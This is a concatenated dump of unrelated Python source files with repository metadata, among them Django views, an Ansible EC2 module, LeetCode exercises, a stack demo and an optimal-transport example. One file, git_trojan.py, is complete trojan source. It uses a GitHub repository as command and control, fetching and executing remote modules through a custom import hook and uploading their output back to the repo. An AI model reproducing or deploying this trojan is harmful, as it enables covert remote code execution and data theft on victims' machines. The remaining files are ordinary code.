rd['description'] = r.description
rd['serial_number'] = r.serial_number
rd['odia'] = str(r.odia)
rd['idia'] = str(r.idia)
rd['fn_length'] = str(r.fn_length)
rd['top_conn'] = r.top_conn
rd['pb'] = r.pb
rd['length'] = str(r.length)
data['rows'].append(rd)
data = simplejson.dumps(data)
return HttpResponse(data, mimetype="application/javascript")
def bha_component_grid_edit(request, object_id) :
run = Run.objects.get(pk=object_id)
bha = BHA.objects.get(run=run)
if request.method=='POST' :
if request.POST['id'] == 'new' :
order = request.POST['order']
if order == 'end' :
order = 9999
order = int(order)
print 'we got here'
c = Component(bha=bha,
order = order,
description = request.POST['description'],
serial_number = request.POST['serial_number'],
odia = request.POST['odia'],
idia = request.POST['idia'],
fn_length = request.POST['fn_length'],
top_conn = request.POST['top_conn'],
pb = request.POST['pb'],
length = request.POST['length']
)
print 'how bout here'
cs = Component.objects.filter(bha=bha).order_by('order')
max_order = 0
for x in cs :
if x.order >= c.order :
x.order += 1
x.save()
if x.order > max_order :
max_order = x.order
if c.order >= max_order :
c.order = max_order + 1
c.save()
else :
c = Component.objects.get(pk = request.POST['id'])
order = int(request.POST['order'])
if c.order != order :
cs = Component.objects.filter(order = order)
if len(cs) :
cs[0].order = c.order
cs[0].save()
c.order = order
c.description = request.POST['description']
c.serial_number = request.POST['serial_number']
c.odia = request.POST['odia']
c.idia = request.POST['idia']
c.fn_length = request.POST['fn_length']
c.top_conn = request.POST['top_conn']
c.pb = request.POST['pb']
c.length = request.POST['length']
c.save()
data = simplejson.dumps(c.pk)
return HttpResponse(data, mimetype="application/javascript")
def bha_component_grid_delete(request, object_id) :
run = Run.objects.get(pk=object_id)
bha = BHA.objects.get(run=run)
if request.method=='POST' :
c = Component.objects.get(pk = request.POST['id'])
order = c.order
c.delete()
cs = Component.objects.filter(bha=bha).order_by('order')
for x in range(len(cs)) :
if cs[x].order != x + 1 :
cs[x].order = x + 1
cs[x].save()
return HttpResponse('true', mimetype="application/javascript")
|
[
"andy@andy-vmdesktop.(none)"
] |
andy@andy-vmdesktop.(none)
|
252c203dd8b3c6c3ccdfa7211fa50cfc0bbb89fc
|
d6ea2105340cfdb7db3a209f69888c7312ecbce9
|
/core/commons.py
|
893e31247a7cf53186a7b1b8608b36286e7b0303
|
[] |
no_license
|
antonyflour/hometrol
|
43bbd723b190185a80e40d7064a7f68d02a7d050
|
e71360ba6170b47d809331050b3b4c204617fe6c
|
refs/heads/master
| 2021-01-19T10:17:57.792982 | 2017-05-23T20:26:23 | 2017-05-23T20:26:23 | 87,851,414 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,988 |
py
|
REG_EXP_MAC_ADDRESS = "[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$"
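# Illustrative example (added): the pattern accepts colon- or dash-separated,
# lowercase MACs, e.g. re.match(REG_EXP_MAC_ADDRESS, "aa:bb:cc:dd:ee:ff") is
# truthy, while mixed separators such as "aa:bb-cc:dd:ee:ff" are rejected by
# the \1 backreference.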
class EngineCommands:
COMMAND_ADD_SHIELD = "addShield"
COMMAND_GET_INFO_SHIELDS= "getShields"
COMMAND_DELETE_SHIELD = "deleteShield"
COMMAND_MODIFY_PIN = "modifyPin"
COMMAND_GET_SHIELD = "getShield"
COMMAND_GET_PIN = "getPin"
COMMAND_SET_PIN_STATE = "setPinState"
COMMAND_MODIFY_SHIELD = "modifyShield"
COMMAND_ADD_EVENT = "addEvent"
COMMAND_GET_INFO_EVENTS = "getEvents"
COMMAND_DELETE_EVENT = "deleteEvent"
COMMAND_GET_SYSTEM_EMAIL = "getSystemEmail"
COMMAND_ADD_SYSTEM_EMAIL = "addSystemEmail"
COMMAND_DELETE_SYSTEM_EMAIL = "deleteSystemEmail"
class URIPath:
URI_MAC = "/arduino_emulate/mac.php"
URI_OUTPUT_PIN = "/arduino_emulate/output_pin.php"
URI_INPUT_PIN = "/arduino_emulate/input_pin.php"
URI_INPUT_STATUS ="/arduino_emulate/input_status.php"
URI_OUTPUT_STATUS ="/arduino_emulate/output_status.php"
URI_SET_STATUS ="/arduino_emulate/set_out.php"
URI_TOGGLE = "/arduino_emulate/toggle.php"
'''
URI_MAC = "/mac"
URI_OUTPUT_PIN = "/output_pin"
URI_INPUT_PIN = "/input_pin"
URI_INPUT_STATUS = "/input_status"
URI_OUTPUT_STATUS = "/output_status"
URI_SET_STATUS = "/setout"
URI_TOGGLE = "/toggle"
'''
class ErrorCode:
ERROR_NOT_FOUND_NUMBER = 404
ERROR_NOT_FOUND_MSG = "Not found"
ERROR_INVALID_BODY_NUMBER = 901
ERROR_INVALID_BODY_MSG = "Invalid body"
ERROR_INVALID_CONTENT_TYPE_NUMBER = 902
ERROR_INVALID_CONTENT_TYPE_MSG = "Invalid content-type : only application/json is supported"
ERROR_INVALID_MAC_NUMBER = 903
ERROR_INVALID_MAC_MSG = "Invalid MAC Address"
ERROR_INVALID_MAC_PIN_NUMBER = 904
ERROR_INVALID_MAC_PIN_MSG = "Invalid MAC Address or Pin Number"
ERROR_PIN_NOT_FOUND_NUMBER = 905
ERROR_PIN_NOT_FOUND_MSG = "Pin not found"
ERROR_SHIELD_NOT_FOUND_NUMBER = 905
ERROR_SHIELD_NOT_FOUND_MSG = "Shield not found"
ERROR_SHIELD_COMMUNICATION_NUMBER = 906
ERROR_SHIELD_COMMUNICATION_MSG = "Impossible to connect to the shield"
ERROR_SHIELD_ALREADY_EXIST_NUMBER = 907
ERROR_SHIELD_ALREADY_EXIST_MSG = "The shield already exist"
ERROR_GENERIC_NUMBER = 908
ERROR_GENERIC_MSG = "Generic Error"
ERROR_COMMAND_NOT_RECOGNIZED_NUMBER = 909
ERROR_COMMAND_NOT_RECOGNIZED_MSG = "Command not recognized"
ERROR_CONDITION_TYPE_NOT_RECOGNIZED_NUMBER = 910
ERROR_CONDITION_TYPE_NOT_RECOGNIZED_MSG = "Condition type not recognized"
ERROR_ACTION_TYPE_NOT_RECOGNIZED_NUMBER = 911
ERROR_ACTION_TYPE_NOT_RECOGNIZED_MSG = "Action type not recognized"
ERROR_EVENT_NOT_FOUND_NUMBER = 912
ERROR_EVENT_NOT_FOUND_MSG = "Event not found"
ERROR_SYSTEM_EMAIL_ALREADY_EXISTS_NUMBER = 913
ERROR_SYSTEM_EMAIL_ALREADY_EXISTS_MSG = "System email already exists, please first remove the old one"
ERROR_TEST_EMAIL_NUMBER = 914
    ERROR_TEST_EMAIL_MSG = "Test email failed"
|
[
"antoniofarina1702@gmail.com"
] |
antoniofarina1702@gmail.com
|
ca2152782390e2a3cd07a0025946143c9aedaa23
|
9a85e9651d076c736fe57b8f957c44fd4a28e2e2
|
/002,leetcode/leetcode-343.py
|
4227901944fce5e65372cddf8a145171762e9006
|
[] |
no_license
|
Jesselinux/Data-Structures-and-Algorithms
|
609b9230caf8a39290cb3581d1106879ff029add
|
768c4d5ea75e9dd6aaf5f920accf32adf3355fdd
|
refs/heads/master
| 2020-05-21T15:35:36.144829 | 2019-09-05T06:26:04 | 2019-09-05T06:26:04 | 186,094,903 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 321 |
py
|
# leetcode-343: dynamic programming; beats 57.79% of submissions
class Solution:
def integerBreak(self, n: int) -> int:
sums = [0, 1]
for i in range(2, n+1):
tmp = 0
for j in range(1, i):
tmp = max(tmp, j*sums[i-j], j*(i-j))
sums.append(tmp)
return sums[n]
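
# Quick sanity check (added, not part of the original submission):
# 10 = 3 + 3 + 4 gives the maximal product 3 * 3 * 4 = 36.
if __name__ == '__main__':
    print(Solution().integerBreak(10))  # expected: 36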
|
[
"wuchang508@163.com"
] |
wuchang508@163.com
|
5d857613084649081412e62cd5a3dd7998e0f1ec
|
a66460a46611483dfbdc94c7996893f427e60d97
|
/ansible/my_env/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ec2_ami_facts.py
|
fe8b57e7640e37f06e0f2c3b8a4e942fbe51bad9
|
[
"MIT"
] |
permissive
|
otus-devops-2019-02/yyashkin_infra
|
06b57807dde26f94f501828c07503d6bf1d70816
|
0cd0c003884155ac922e3e301305ac202de7028c
|
refs/heads/master
| 2020-04-29T02:42:22.056724 | 2019-05-15T16:24:35 | 2019-05-15T16:24:35 | 175,780,718 | 0 | 0 |
MIT
| 2019-05-15T16:24:36 | 2019-03-15T08:37:35 |
HCL
|
UTF-8
|
Python
| false | false | 8,737 |
py
|
#!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_ami_facts
version_added: '2.5'
short_description: Gather facts about ec2 AMIs
description: Gather facts about ec2 AMIs
author:
- Prasad Katti, @prasadkatti
requirements: [ boto3 ]
options:
image_ids:
description: One or more image IDs.
aliases: [image_id]
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value.
- See U(https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeImages.html) for possible filters.
- Filter names and values are case sensitive.
owners:
description:
- Filter the images by the owner. Valid options are an AWS account ID, self,
- or an AWS owner alias ( amazon | aws-marketplace | microsoft ).
aliases: [owner]
executable_users:
description:
- Filter images by users with explicit launch permissions. Valid options are an AWS account ID, self, or all (public AMIs).
aliases: [executable_user]
describe_image_attributes:
description:
- Describe attributes (like launchPermission) of the images found.
default: no
type: bool
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
- name: gather facts about an AMI using ami-id
ec2_ami_facts:
image_ids: ami-5b488823
- name: gather facts about all AMIs with tag key Name and value webapp
ec2_ami_facts:
filters:
"tag:Name": webapp
- name: gather facts about an AMI with 'AMI Name' equal to foobar
ec2_ami_facts:
filters:
name: foobar
- name: gather facts about Ubuntu 17.04 AMIs published by Canonical (099720109477)
ec2_ami_facts:
owners: 099720109477
filters:
name: "ubuntu/images/ubuntu-zesty-17.04-*"
'''
RETURN = '''
images:
description: a list of images
returned: always
type: complex
contains:
architecture:
description: The architecture of the image
returned: always
type: string
sample: x86_64
block_device_mappings:
description: Any block device mapping entries
returned: always
type: complex
contains:
device_name:
description: The device name exposed to the instance
returned: always
type: string
sample: /dev/sda1
ebs:
description: EBS volumes
returned: always
type: complex
creation_date:
description: The date and time the image was created
returned: always
type: string
sample: '2017-10-16T19:22:13.000Z'
description:
description: The description of the AMI
returned: always
type: string
sample: ''
ena_support:
description: whether enhanced networking with ENA is enabled
returned: always
type: bool
sample: true
hypervisor:
description: The hypervisor type of the image
returned: always
type: string
sample: xen
image_id:
description: The ID of the AMI
returned: always
type: string
sample: ami-5b466623
image_location:
description: The location of the AMI
returned: always
type: string
sample: 408466080000/Webapp
image_type:
description: The type of image
returned: always
type: string
sample: machine
launch_permissions:
description: launch permissions of the ami
returned: when image is owned by calling account and describe_image_attributes is yes
type: complex
sample: [{"group": "all"}, {"user_id": "408466080000"}]
name:
description: The name of the AMI that was provided during image creation
returned: always
type: string
sample: Webapp
owner_id:
description: The AWS account ID of the image owner
returned: always
type: string
sample: '408466080000'
public:
description: whether the image has public launch permissions
returned: always
type: bool
sample: true
root_device_name:
description: The device name of the root device
returned: always
type: string
sample: /dev/sda1
root_device_type:
description: The type of root device used by the AMI
returned: always
type: string
sample: ebs
sriov_net_support:
description: whether enhanced networking is enabled
returned: always
type: string
sample: simple
state:
description: The current state of the AMI
returned: always
type: string
sample: available
tags:
description: Any tags assigned to the image
returned: always
type: complex
virtualization_type:
description: The type of virtualization of the AMI
returned: always
type: string
sample: hvm
'''
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import (boto3_conn, ec2_argument_spec, get_aws_connection_info, ansible_dict_to_boto3_filter_list,
camel_dict_to_snake_dict, boto3_tag_list_to_ansible_dict)
def list_ec2_images(ec2_client, module):
image_ids = module.params.get("image_ids")
owners = module.params.get("owners")
executable_users = module.params.get("executable_users")
filters = module.params.get("filters")
owner_param = []
# describe_images is *very* slow if you pass the `Owners`
# param (unless it's self), for some reason.
# Converting the owners to filters and removing from the
# owners param greatly speeds things up.
# Implementation based on aioue's suggestion in #24886
for owner in owners:
if owner.isdigit():
if 'owner-id' not in filters:
filters['owner-id'] = list()
filters['owner-id'].append(owner)
elif owner == 'self':
# self not a valid owner-alias filter (https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeImages.html)
owner_param.append(owner)
else:
if 'owner-alias' not in filters:
filters['owner-alias'] = list()
filters['owner-alias'].append(owner)
filters = ansible_dict_to_boto3_filter_list(filters)
try:
images = ec2_client.describe_images(ImageIds=image_ids, Filters=filters, Owners=owner_param, ExecutableUsers=executable_users)
images = [camel_dict_to_snake_dict(image) for image in images["Images"]]
except (ClientError, BotoCoreError) as err:
module.fail_json_aws(err, msg="error describing images")
for image in images:
try:
image['tags'] = boto3_tag_list_to_ansible_dict(image.get('tags', []))
if module.params.get("describe_image_attributes"):
launch_permissions = ec2_client.describe_image_attribute(Attribute='launchPermission', ImageId=image['image_id'])['LaunchPermissions']
image['launch_permissions'] = [camel_dict_to_snake_dict(perm) for perm in launch_permissions]
except (ClientError, BotoCoreError) as err:
# describing launch permissions of images owned by others is not permitted, but shouldn't cause failures
pass
images.sort(key=lambda e: e.get('creation_date', '')) # it may be possible that creation_date does not always exist
module.exit_json(images=images)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
image_ids=dict(default=[], type='list', aliases=['image_id']),
filters=dict(default={}, type='dict'),
owners=dict(default=[], type='list', aliases=['owner']),
executable_users=dict(default=[], type='list', aliases=['executable_user']),
describe_image_attributes=dict(default=False, type='bool')
)
)
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=True)
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
if region:
ec2_client = boto3_conn(module, conn_type='client', resource='ec2', region=region, endpoint=ec2_url, **aws_connect_params)
else:
module.fail_json(msg="region must be specified")
list_ec2_images(ec2_client, module)
if __name__ == '__main__':
main()
|
[
"theyashkins@gmail.com"
] |
theyashkins@gmail.com
|
e55a2fc605a7f546f9760bd66cc1036142daa65b
|
70f3d3ab092e0656f48fce163d9c4a1baf91caec
|
/manage.py
|
5a36edabacbcf2891e80d38c9215b9b2ba7c7cb1
|
[] |
no_license
|
wq56789/Django0109
|
5cca6ff7d477d14a8a3db260b907298bd90e1812
|
cda7c9e5bc5b770d24ffec5ca5c2e7d2e94e2b51
|
refs/heads/master
| 2021-04-24T21:40:54.045733 | 2018-01-10T09:47:36 | 2018-01-10T09:47:36 | 116,754,840 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 542 |
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Django0109.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
[
"2628540889@qq.com"
] |
2628540889@qq.com
|
f4e6967c090f73bb4b1bf0ab41f5a3bf62707793
|
2480d64a4419705e453cc4e074ac121d1ae72f37
|
/_data-processing/myvirtualenv/bin/symilar
|
7efc626f908dcdc006c10617333b831cf3831880
|
[] |
no_license
|
rbdone/lotr-api
|
4e98bc668aa71fb1f176c238d024dda32facdb8c
|
1ec0a087d58fae3918a2586af878846d27ee12e1
|
refs/heads/master
| 2022-12-01T08:01:55.617851 | 2020-08-14T23:12:25 | 2020-08-14T23:12:25 | 287,639,055 | 0 | 0 | null | 2020-08-14T23:12:27 | 2020-08-14T22:58:16 | null |
UTF-8
|
Python
| false | false | 278 |
#!/media/ulrike/Daten/CODING/projects/lotr-api/data-processing/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_symilar
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run_symilar())
|
[
"hello@ueberdiespree.de"
] |
hello@ueberdiespree.de
|
|
b5a639dd6e57d236d82a3261a090bd72e75c1bef
|
29336042b81ffab736a38dadcdf269296ce72c65
|
/doit_ds_algorithm_python/04/stack_test.py
|
f72381e742301d270a49aa04e537322f02d41d2f
|
[] |
no_license
|
wndms0901/algorithm
|
61dd0e6a819c7714a96062e9e7f4c1eee453971e
|
65c3b6f527ee659e89997ad8113195bd3377002b
|
refs/heads/main
| 2023-02-27T12:21:46.340051 | 2021-02-08T14:39:31 | 2021-02-08T14:39:31 | 328,971,900 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,651 |
py
|
# Using a fixed-length stack class (collections.deque)
from enum import Enum
from stack import Stack

Menu = Enum('Menu', ['푸시', '팝', '피크', '검색', '덤프', '종료'])

def select_menu() -> Menu:
    """Prompt for a menu selection"""
    s = [f'({m.value}){m.name}' for m in Menu]
    while True:
        print(*s, sep=' ', end='')
        n = int(input(': '))
        if 1 <= n <= len(Menu):
            return Menu(n)

s = Stack(64)  # a stack that can hold up to 64 pushed items

while True:
    print(f'Current number of items: {len(s)} / {s.capacity}')
    menu = select_menu()  # menu selection
    if menu == Menu.푸시:  # push
        x = int(input('Enter a value to push> '))
        try:
            s.push(x)
        except IndexError:
            print('The stack is full.')
    elif menu == Menu.팝:  # pop
        try:
            x = s.pop()
            print(f'The popped value is {x}.')
        except IndexError:
            print('The stack is empty.')
    elif menu == Menu.피크:  # peek
        try:
            x = s.peek()
            print(f'The peeked value is {x}.')
        except IndexError:
            print('The stack is empty.')
    elif menu == Menu.검색:  # search
        x = int(input('Enter a value to search for> '))
        if x in s:
            print(f'The stack contains {s.count(x)} occurrence(s); the frontmost position is {s.find(x)}.')
        else:
            print('The value is not in the stack.')
    elif menu == Menu.덤프:  # dump
        s.dump()
    else:
        break
|
[
"cherry25987@gmail.com"
] |
cherry25987@gmail.com
|
284b16862546a04753ca39ee352a14563fc28272
|
eaf97194e79c31d80f7786b64bbf621581a95dec
|
/example.py
|
bba3baa0753070fdc4a03e7eb9cbacab6300db59
|
[] |
no_license
|
codesharedot/levolution-price
|
333902c32137f9a82bd9d21b26575d646e0f4bb9
|
60c9d52fa42190e4fa929ead32ca611766906005
|
refs/heads/master
| 2020-08-02T14:26:47.832555 | 2019-09-27T19:27:47 | 2019-09-27T19:27:47 | 211,388,241 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 616 |
py
|
import requests
import json
from forex_python.converter import CurrencyRates
import os
c = CurrencyRates()
rate = c.get_rate('USD', 'EUR')
print(rate)
levolution_api_url = 'https://api.coinmarketcap.com/v1/ticker/levolution/'
response = requests.get(levolution_api_url)
response_json = response.json()
print(response_json)
for coin in response.json():
price = coin.get("price_usd", "U$S Price not provided")
coin_price = float(("{0:.2f}").format(float(price)))
print("$ " + str(coin_price))
coin_price_eur = float(("{0:.2f}").format(float(price)*rate))
print("€ " + str(coin_price_eur))
|
[
"codeto@sent.com"
] |
codeto@sent.com
|
daf06ec2976e73d31fcee328355ba9e2cce230b9
|
f3f3c68e7155396deb2bad0a8c82b5df86a67501
|
/binary_tree_divide_conquer/binary_tree_max_path_sum_from_root.py
|
7ee4174e42c467009946b49b30c40d873b96b19c
|
[] |
no_license
|
libinjungle/LeetCode_Python
|
41068dc79cd4f065964b4cab39d52fedb380df2f
|
49d0831387227e69ae4067c1f5b7e828976377b4
|
refs/heads/master
| 2020-04-06T07:02:15.905469 | 2016-08-22T02:37:55 | 2016-08-22T02:37:55 | 59,625,708 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 726 |
py
|
class TreeNode(object):
def __init__(self, val):
self.val = val
self.left = None
self.right = None
class Solution(object):
def maxPathSumFromRoot(self, root):
"""
Divide_And_Conquer
max sum is equal to the max of left and right child plus the root value.
:param root:
:return:
"""
if root is None:
return 0
maxleft = self.maxPathSumFromRoot(root.left)
maxright = self.maxPathSumFromRoot(root.right)
return max(maxleft, maxright) + root.val
if __name__ == "__main__":
sol = Solution()
root = TreeNode(1)
root.left = TreeNode(2)
root.right = TreeNode(3)
root.left.left = TreeNode(4)
root.left.right = TreeNode(5)
print(sol.maxPathSumFromRoot(root))
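    # Expected output (added): 8, the root-anchored path 1 -> 2 -> 5.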
|
[
"libinnku@gmail.com"
] |
libinnku@gmail.com
|
df3847d46c128ea4255e64467cb577d4e348b21b
|
469e3e8de616263bab857df1050d426f40c30d5c
|
/module3.py
|
5d847f0e4e820befd42f51495c91329a0d3b6499
|
[
"MIT"
] |
permissive
|
listenzcc/QuickPythonConfig
|
d487e3c35e906f84503d8992152ee79909d0da30
|
ff883c1dd2b7a23a114ec794e3d711fd5d1d15c1
|
refs/heads/main
| 2023-01-07T20:30:39.060803 | 2020-11-10T08:52:10 | 2020-11-10T08:52:10 | 306,575,328 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 371 |
py
|
# Example of using customized Config object
from Package.defines import Config
config = Config()
config.reload_logger('develop')
config.reload_cfg()
def main():
print('---------------------------------------------------------')
print(config.peek())
config.set('Module 3', 'says', 'It should be a brand new configure')
print(config.peek())
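
# Entry-point guard (added): the original defines main() but never invokes it.
if __name__ == '__main__':
    main()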
|
[
"listenzcc@mail.bnu.edu.cn"
] |
listenzcc@mail.bnu.edu.cn
|
e52c20ecaeaa12fab452e4bfc96ac0cfec2f5a02
|
bc301fd884d9efed927dbe6d25dfef11584e7739
|
/p_code/RL/MDP/mrp.py
|
1b1a9ddbcda31721c670903f13058816cd012a30
|
[] |
no_license
|
MonaHe123/coding-exercise
|
87084c1dc2553cea2413992ec00c33be6b31c27a
|
9c1db48888da9f83fa0bce47c297b070f513726e
|
refs/heads/main
| 2023-06-13T08:21:09.647454 | 2021-07-05T08:34:27 | 2021-07-05T08:34:27 | 367,765,253 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,126 |
py
|
"""
author:龚俊老婆
参考:叶强大佬
验证MRP,进行简单的轨迹回报计算
"""
#MRP包括:状态,转移概率,奖励,衰减因子
import numpy as np
from numpy.lib.shape_base import expand_dims
#状态
num_state = 7
#states' name to index
i_to_n = {}
i_to_n['0'] = 'C1'
i_to_n['1'] = 'C2'
i_to_n['2'] = 'C3'
i_to_n['3'] = 'Pass'
i_to_n['4'] = 'Pub'
i_to_n['5'] = 'FB'
i_to_n['6'] = 'Sleep'
# build the inverse mapping: state name -> index
# zip pairs up the dict's keys and values as tuples
n_to_i = {}
for i,name in zip(i_to_n.keys(),i_to_n.values()):
n_to_i[name] = int(i)
# transition probability matrix
#C1,C2,C3,PASS,PUB,FB,SLEEP
Pss = [
[0.0,0.5,0.0,0.0,0.0,0.5,0.0],
[0.0,0.0,0.8,0.0,0.0,0.0,0.2],
[0.0,0.0,0.0,0.6,0.4,0.0,0.0],
[0.0,0.0,0.0,0.0,0.0,0.0,1.0],
[0.2,0.4,0.4,0.0,0.0,0.0,0.0],
[0.1,0.0,0.0,0.0,0.0,0.9,0.0],
[0.0,0.0,0.0,0.0,0.0,0.0,1.0]
]
# reward: indexed by state, gives the reward received in that state
reward = [-2,-2,-2,10,1,-1,0]
# discount factor
gamma = 0.5
# compute the return of a single trajectory
def compute_return(start_index = 0,
chain = None,
gamma = 0.5)->float:
"""
Args:
        start_index: position in the chain from which to start the calculation
        chain: the trajectory, as a list of state names
        gamma: discount factor
Returns:
        the return, as a float
"""
    # return accumulated from start_index to the end of the chain
G_start = 0.0
for i in range(start_index,len(chain)):
G_start += np.power(gamma,i-start_index)*reward[n_to_i[chain[i]]]
return G_start
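# Worked example (added for clarity): for the chain C1 -> C2 -> C3 -> Pass -> Sleep
# with gamma = 0.5, the return is
#   -2 + 0.5*(-2) + 0.25*(-2) + 0.125*10 + 0.0625*0 = -2.25,
# matching the first example output below.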
#examples
chains = [
['C1','C2','C3','Pass','Sleep'],
['C1','FB','FB','C1','C2','Sleep'],
['C1','C2','C3','Pub','C2','C3','Pass','Sleep'],
['C1','FB','FB','C1','C2','C3','Pub','C1',\
'FB','FB','FB','C1','C2','C3','Pub','C2','Sleep']
]
example_return = []
for i in range(4):
example_return.append(compute_return(0,chains[i],0.5))
print("The return of chian {0} is {1}".format(i,example_return[i]))
# the output is as follows:
"""
The return of chain 0 is -2.25
The return of chain 1 is -3.125
The return of chain 2 is -3.40625
The return of chain 3 is -3.196044921875
"""
|
[
"1600012917@pku.edu.cn"
] |
1600012917@pku.edu.cn
|
a87e412a4eb7af7d0d6c53b2b372fce0dbdd135b
|
a0914d6d16eb2d0e0c5fb570c9a68bc46a652ed4
|
/git_trojan.py
|
6c3412da1cadee3451999ecc3a79f6497b95dbf7
|
[] |
no_license
|
jdefrancesco/chapter0
|
8c8cc045ffd36804ead3b495f89beb824022eee0
|
d218d5d07d93e7b7d79a0a452eb99dfb4ebfacc3
|
refs/heads/master
| 2016-09-05T12:08:30.940128 | 2015-01-15T14:56:51 | 2015-01-15T14:56:51 | 29,213,052 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,703 |
py
|
#!/usr/bin/env python
import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
from github3 import login
PASSWD = ""
trojan_id = "abc"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules = []
configured = False
task_queue = Queue.Queue()
def connect_to_github():
global PASSWD
gh = login(username="jdefr89@gmail.com", password=PASSWD)
repo = gh.repository("jdefr89@gmail.com", "chapter0")
branch = repo.branch("master")
return gh, repo, branch
def get_file_contents(filepath):
gh, repo, branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if filepath in filename.path:
print "[*] Found file: %s" % filepath
            blob = repo.blob(filename._json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
config = json.loads(base64.b64decode(config_json))
configured = True
for task in config:
if task['module'] not in sys.modules:
exec("import %s" % task['module'])
return config
def store_module_result(data):
gh, repo, branch = connect_to_github()
remote_path = "data/%s/%d.data" % (trojan_id, random.randint(1000, 100000))
repo.create_file(remote_path, "Commit message", base64.b64encode(data))
return
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
# store result in repo
store_module_result(result)
return
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self, fullname, path=None):
if configured:
print "[*] Attempting to retrieve %s" % fullname
new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self, name):
module = imp.new_module(name)
exec self.current_module_code in module.__dict__
sys.modules[name] = module
return module
# Main trojan loop --
sys.meta_path = [GitImporter()]
while True:
if task_queue.empty():
config = get_trojan_config()
for task in config:
t = threading.Thread(target=module_runner, args=(task['module'],))
t.start()
time.sleep(random.randint(1, 10))
time.sleep(random.randint(1000, 10000))
|
[
"jdefr89@gmail.com"
] |
jdefr89@gmail.com
|
2d26d60da3093aabef092d3dbedd7020551ba13b
|
fc0383786c3b997a1c205749018cfc52114fc2fd
|
/docs/source/auto_examples/plot_otda_color_images.py
|
e77aec0878b6ce041a77db92a9b57d29622a5c96
|
[
"MIT"
] |
permissive
|
vfdev-5/POT
|
5a9537e6c788fe53d8dbed2e349c811e9a057b7d
|
e757b75976ece1e6e53e655852b9f8863e7b6f5a
|
refs/heads/master
| 2020-04-28T11:14:40.532459 | 2019-03-11T15:59:57 | 2019-03-11T15:59:57 | 175,230,317 | 0 | 0 |
MIT
| 2019-03-12T14:33:50 | 2019-03-12T14:33:50 | null |
UTF-8
|
Python
| false | false | 3,597 |
py
|
# -*- coding: utf-8 -*-
"""
=============================
OT for image color adaptation
=============================
This example presents a way of transferring colors between two images
with Optimal Transport as introduced in [6]
[6] Ferradans, S., Papadakis, N., Peyre, G., & Aujol, J. F. (2014).
Regularized discrete optimal transport.
SIAM Journal on Imaging Sciences, 7(3), 1853-1882.
"""
# Authors: Remi Flamary <remi.flamary@unice.fr>
# Stanislas Chambon <stan.chambon@gmail.com>
#
# License: MIT License
import numpy as np
from scipy import ndimage
import matplotlib.pylab as pl
import ot
r = np.random.RandomState(42)
def im2mat(I):
"""Converts and image to matrix (one pixel per line)"""
return I.reshape((I.shape[0] * I.shape[1], I.shape[2]))
def mat2im(X, shape):
"""Converts back a matrix to an image"""
return X.reshape(shape)
def minmax(I):
return np.clip(I, 0, 1)
##############################################################################
# Generate data
# -------------
# Loading images
I1 = ndimage.imread('../data/ocean_day.jpg').astype(np.float64) / 256
I2 = ndimage.imread('../data/ocean_sunset.jpg').astype(np.float64) / 256
X1 = im2mat(I1)
X2 = im2mat(I2)
# training samples
nb = 1000
idx1 = r.randint(X1.shape[0], size=(nb,))
idx2 = r.randint(X2.shape[0], size=(nb,))
Xs = X1[idx1, :]
Xt = X2[idx2, :]
##############################################################################
# Plot original image
# -------------------
pl.figure(1, figsize=(6.4, 3))
pl.subplot(1, 2, 1)
pl.imshow(I1)
pl.axis('off')
pl.title('Image 1')
pl.subplot(1, 2, 2)
pl.imshow(I2)
pl.axis('off')
pl.title('Image 2')
##############################################################################
# Scatter plot of colors
# ----------------------
pl.figure(2, figsize=(6.4, 3))
pl.subplot(1, 2, 1)
pl.scatter(Xs[:, 0], Xs[:, 2], c=Xs)
pl.axis([0, 1, 0, 1])
pl.xlabel('Red')
pl.ylabel('Blue')
pl.title('Image 1')
pl.subplot(1, 2, 2)
pl.scatter(Xt[:, 0], Xt[:, 2], c=Xt)
pl.axis([0, 1, 0, 1])
pl.xlabel('Red')
pl.ylabel('Blue')
pl.title('Image 2')
